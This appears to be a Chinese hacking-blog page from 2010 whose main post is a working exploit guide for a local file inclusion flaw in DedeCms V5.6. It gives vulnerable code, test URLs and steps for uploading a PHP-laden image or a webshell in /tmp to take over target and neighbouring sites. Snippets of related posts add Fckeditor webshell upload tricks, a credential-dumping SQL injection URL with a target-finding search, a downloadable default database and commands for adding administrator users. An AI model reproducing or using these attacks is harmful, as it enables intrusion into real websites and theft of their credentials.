DedeCmsV5.6再爆0day 本地包含鸡助0day漏洞

DedeCmsV5.6 程序plus/carbuyaction.php 变量未初始化，造成本地文件包含漏洞。

代码:

<?php require_once (dirname(__FILE__) . “/../include/common.inc.php”); define(‘_PLUS_TPL_’, DEDEROOT.’/templets/plus’); require_once DEDEINC.’/dedetemplate.class.php’; require_once DEDEINC.’/shopcar.class.php’; require_once DEDEINC.’/memberlogin.class.php’; if($cfg_mb_open==’N') { ShowMsg(“系统关闭了会员功能，因此你无法访问此页面！”,”javascript:;”); exit(); } $cfg_ml = new MemberLogin(); if(!isset($dopost) || empty($dopost)){ //只要$dopost不为空就行，By：qing。 … }elseif($dopost == ‘return’){ require_once DEDEINC.’/payment/’.$code.’.php’; //变量$code未初始化， $pay = new $code; $msg=$pay->respond(); ShowMsg($msg,”javascript:;”,0,3000); exit(); } ?>

测试代码:http://www.hackqing.cn/plus/carbuyaction.php?dopost=return&code=../../

1、 plus/carbuyaction.php文件：

//漏洞出现下$dopost 为return的时候，$code变量没有被赋值，由于dedecms的全局机制可以任意给其赋值，从而带入包含，导致本地包含漏洞。

…

elseif($dopost == ‘return’){ //$code直接引入， require_once DEDEINC.’/payment/’.$code.’.php’; $pay = new $code; $msg=$pay->respond(); ShowMsg($msg,”javascript:;”,0,3000); exit(); }
…
2、 include/common.inc.php：

//无论是否打开magic_quotes_gpc，系统都对传进来的变量进行了addslashes处理，…

IIS或者某些apache版本下php文件系统可以进行路径截断，
可以通过
///////////////////////////////////（若干/）
/././././././././././././././././（若干/.）
进行截断。

于是可以上传一个精心构造带有恶意php代码的图片，然后注册一个用户上传，比如上传到uploads/userup/2/12Ka5357-c53.jpg，于是可以通过访问：

http://127.0.0.1/ plus/carbuyaction.php?dopost=return&code=../../uploads/userup/2/12Ka5357-c53.jpg///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////（若干/）

则有可能执行12Ka5357-c53.jpg中的恶意php代码，从而达到入侵的目的。

2.linux系统：

1）apache某些版本php文件系统支持路径截断，于是同windows下，可以通过
///////////////////////////////////（若干/）
/././././././././././././././././（若干/.）
进行截断。

利用方法同windows:

于是可以上传一个精心构造带有恶意php代码的图片，然后注册一个用户上传，比如上传到uploads/userup/2/12Ka5357-c53.jpg，于是可以通过访问：

则有可能执行12Ka5357-c53.jpg中的恶意php代码，从而达到入侵的目的。

2）旁注攻击

比如目标站是www.aaa.com，漏洞文件是：
http://www.aaa.com/ plus/carbuyaction.php

同服务器有个站点www.bbb.com可以轻松入侵，拿到webshell，但是由于权限控制，www.bbb.com站的webshell访问或者控制不了www.aaa.com，于是我们可以通过这个本地包含漏洞达到入侵www.aaa.com的目的。

1. 通过www.bbb.com上传一个webshell到/tmp文件夹下，比如文件名是shell.php；
2. 访问http://www.aaa.com/plus/carbuyaction.php?code=../../../../../../../tmp/shell则可以成功包含我们上传到临时文件夹下的webshell，由于当前是www.aaa.com的权限，则可以完全控制目标站点：www.aaa.com。

0day, 安全, 攻击, 攻防, 漏洞, 网络, 黑客

打印文章

这篇文章由小枫于2010年06月26日 2:19 下午发表在即时新闻。你可以订阅RSS 2.0 也可以发表评论或引用到你的网站。

没有评论

没有引用

Fckeditor利用总结

大约1周前 - 没有评论

Fckeditor版本多..支持很多语言..所以本文不针对任何版本或者什么语言.只讲利用方法 fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp 当你知道fckeditor目录时..你输入以上地址..就会看到有个上传的地方..如图所示: 这里有个上传的地方…老版本的fckeditor可以上传.Asa后缀的文件(也就是你的马) 如果不行的话…我们可以利用iis的路径解析漏洞.建一个hx.Asp的目录.再这目录下上传马还可以上传“图片”.这里指的图片是.Jpg格式后缀的马(结合iis6.0的解析漏洞 hx.Asp;.Jpg)以上效果如图所示: 因为版本的不同..有些管理员会把一些没用的目录删除..比如我是aspx的站..就会把asp.Php的目录删了.. 那么这时候自己就要改..fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx 改成这样是一样的..也有时候有的站会把asp破坏掉..而这时假到aspx php都没有做任何破坏..所以有时修自己多跳下目录..browser.html?Type=Image这里image是表示类型.. 如果你打不开fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp里..可以试着打开 fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/asp/connector.Asp ..Type类型可以自己改.我没碰到过.. fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.Asp 这样的可以跳到根目录…很少碰到…不过也不是不存在这样的站…这里也可以把全站目录列出来.. 那么这样都被破坏了..也都不行了…那要怎么办呢..在connectors目录下有个test.Html 文件..那里也可以上传..可以上传任意文件他都会返回一个地址给你..如图所示：虽然是返回不允许上传的类型..但还是会返回地址..那个路径是在下面框里查看源文件得到的… 上传cer有时候也行.hx.Jpg;hx.Jpg 都行…在test.Html页面里有几个地方要注意.. Connector 也就是Connector=connectors/asp/connector.Asp是一个样的哈..有aspx php 等..其实都只是调用..如果asp不行..换aspx php 同上方法…还有一个是本地构造上传的源码如下: <form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.xxx.com.cn/fckeditor/editor/filemanager/browser/default/connectors/asp/upload.asp?Type=Media” method=”post”> Upload a new file:<br> <input type=”file” name=”NewFile” size=”50″><br> <input id=”btnUpload” type=”submit” value=”Upload”> </form> 没了test.Html这里也还可以上传..一样的效果..有些网站的connectors/asp/upload.Asp 所在的目录不一定相同…有的是fckeditor/editor/connectors/asp/upload.Asp这路径.. And so on

phpwind 7.5 0day漏洞运用

大约2月前 - 14个评论

phpwind 7.5 Multiple Include Vulnerabilities 壹.api/class_base.php本地包含漏洞 1.描敘 api/class_base.php文件裏callback函數裏$mode變量沒有過濾導致任意包含本地文件,從而可以執行任意PHP命令. 2. 具體分析 api/class_base.php文件裏: function callback($mode, $method, $params) { if (!isset($this->classdb[$mode])) { if (!file_exists(R_P.’api/class_’ . $mode . ‘.php’)) { return new ErrorMsg(API_MODE_NOT_EXISTS, “Class($mode) Not Exists”); } require_once(R_P.’api/class_’ . $mode . ‘.php’); //這裏 $this->classdb[$mode] = new $mode($this); } if (!method_exists($this->classdb[$mode], $method)) { return new ErrorMsg(API_METHOD_NOT_EXISTS, “Method($method of $mode) Not

Infront 程序存在SQL注入漏洞

大约2月前 - 没有评论

Infront 程序存在SQL注入漏洞，可获取管理权限。批量：google：intext:Powered by Infront 漏洞页面 : breaking_news.php Exploit Code : http://www.hackzhi.org/变量路径/breaking_news.php?newsid=union select 1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login 后台登入： http://www.hackzhi.org/变量路径/login.php 演示：http://www.hackzhi.org/breaking_news.php?newsid=-103+UNION+SELECT+1,2,3,concat(email,0x3e,user,0x3e,pass),5,6+FROM+login– 首发TheMaster

PHPCMS网站管理系统ADSCLASS.PHP页面过滤不严导致SQL注入漏洞

大约2月前 - 没有评论

添加时间: 2010-05-24 系统编号: WAVDB-01629 影响版本: phpcms2008sp4_UTF8_100510 程序介绍: Phpcms是一款基于 PHP+Mysql 架构的网站内容管理系统，也是一个开源的 PHP 开发平台。Phpcms 采用模块化方式开发，功能易用便于扩展，可面向大中型站点提供重量级网站建设解决方案。3年来，凭借 Phpcms 团队长期积累的丰富的Web开发及数据库经验和勇于创新追求完美的设计理念，使得 Phpcms 得到了近10万网站的认可，并且越来越多地被应用到大中型商业网站漏洞分析: ads\include\ads.class.php function edit($ads, $adsid, $username = ”) //110行 { if(!$this->check_form($ads)) return FALSE; $ads = $this->check_form($ads); if(defined(‘IN_ADMIN’)) } $ads['fromdate'] = strtotime($ads['fromdate']); $ads['todate'] = strtotime($ads['todate']); { $this->adsid = $adsid; $where = ‘ adsid=’.$this->adsid; if($username) $where .= ” AND username=’$username’”; return $this->db->update($this->table, $ads, $where); } Ads\member.php if(!$c_ads->edit($info, $adsid, $_username))

商达讯商城购物系统4.01官方正式简体中文版漏洞

大约2月前 - 8个评论

网店系统简介：该程序是用于建立独立网店系统，操作简便直观容易操作，同时完全开放代码方便客户根据自己需求做二次开发，此次升级主要提升了安全内核，特别是增加了适合淘宝拍拍店主开独立分店的淘宝拍拍数据库导入功能。内置安装了支付宝|快钱|Qpay网上支付平台手机网上支付系统,后台自己操作填上帐号和校验码就可以用了,功能齐全,性能稳定,是功能强大的网店系统。淘宝拍拍分店版最新亮点功能，改版程序增加了淘宝拍拍店数据导入快速同步建站功能，该功能可以快速实现淘宝拍拍店主快速同步建立自己独立品牌独立网店愿望，以便拓展自己独立的营销渠道和策略，应对淘宝拍拍等霸道的限制！该导入组件使用方便，便于升级，是目前淘宝拍拍数据导入网店最先进的！！测试时间：10-5-28 测试版本：4.01官方正式简体中文版测试环境：winxp 测试漏洞：数据库没有做防下载处理，默认数据库#sdxshopmianfei#.mdb 老办法#改为%23即可下载%23sdxshopmianfei%23.mdb

DOS命令基本字典.一

大约9月前 - 没有评论

链接 net use \\ip\ipc$ “密码” /user:”用户名” 建立IPC非空链接 net use h: \\ip\c$ “密码” /user:”用户名” 直接登陆后映射对方C：到本地为H: net use h: \\ip\c$ 登陆后映射对方C：到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net uｓer 用户名　密码　/add 建立用户 net uｓer guest /active:yes 激活guest用户 net uｓer 查看有哪些用户 net uｓer 帐户名查看帐户的属性 net lｏcalgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 net start 查看开启了哪些服务 net

DedeCmsV5.6再爆0day 本地包含 鸡助0day漏洞